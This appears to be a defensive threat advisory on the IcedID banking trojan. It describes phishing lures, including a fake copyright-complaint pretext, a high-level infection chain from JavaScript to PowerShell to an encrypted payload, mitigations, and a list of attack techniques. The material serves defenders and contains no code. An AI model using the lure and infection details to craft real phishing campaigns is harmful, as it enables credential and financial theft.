First noticed in 2017, IcedID is a banking trojan that steals financial information. IcedID has also been leveraged as a dropper for other malware and in the infection stage of ransomware operations.
This malware follows multiple delivery methods, out of which phishing emails with macro embedded attachments are the most prevalent. In a recent campaign involving IcedID, attackers abused website contact forms of multiple enterprises, used emails laced with malicious links, which when clicked downloaded a malicious .zip file. These emails, usually, tend to create a sense of urgency, provoking immediate action.
For instance, the sender pretends to be a photographer threatening legal action against the company for using his photos on their site, without permission. The sender then shares a malicious link which purports to be evidence that proves the incident. On clicking the link, however, the recipient is navigated to a Google page that downloads the malicious .zip file.
The phishing emails that IcedID campaigns use contain a malicious link, that when clicked on loads a Google page. This page then requires the unsuspecting victim to sign in with their google credentials. Upon signing in a malicious zip file is automatically downloaded on the victim’s machine. If at all the first link fails, they are redirected to a .top domain which then leads to a Google User Content page that downloads the malicious zip file.
Stages of execution:
- A Shell object is created after executing the previous JS file
- The Shell object launches PowerShell to download the IcedID payload in .dat format
- The IcedID payload is well encrypted to escape detection
- IcedID is a banking trojan that steals the victim’s banking credentials and other financial information in the infected system and sends the information gathered to the attacker’s C2.
- IcedID also acts as a loader for other types of payloads like ransomware, furthering other forms of attacks.
- The banking trojan affects the privacy of its victims and abuses their financial information.
- Infecting the system with ransomware will have an adverse impact on the business and its reputation.
- Raise awareness about phishing emails and malicious links.
- Use Multi-Factor Authentication for all accounts.
- Users are advised to patch their systems and always be up to date.
- Use the latest AV software.
Tactics, Techniques, and Procedures
|Search victim-owned websites
|Spear phishing attachment
|Spear phishing link
|Command and scripting interpreter
|Windows management Instrumentation
|Credentials from web browsers
|Domain trust discovery
|Remote system discovery
|Security software discovery
|System information discovery
|System network configuration discovery
|Remote Desktop Protocol
|SMB/Windows admin shares
|Man in the browser
Command and Control
|Application Layer Protocol
|Exfiltration over asymmetric encrypted non-C2 protocol
|Data encrypted for impact
Indicators of Compromise
File Hash – SHA1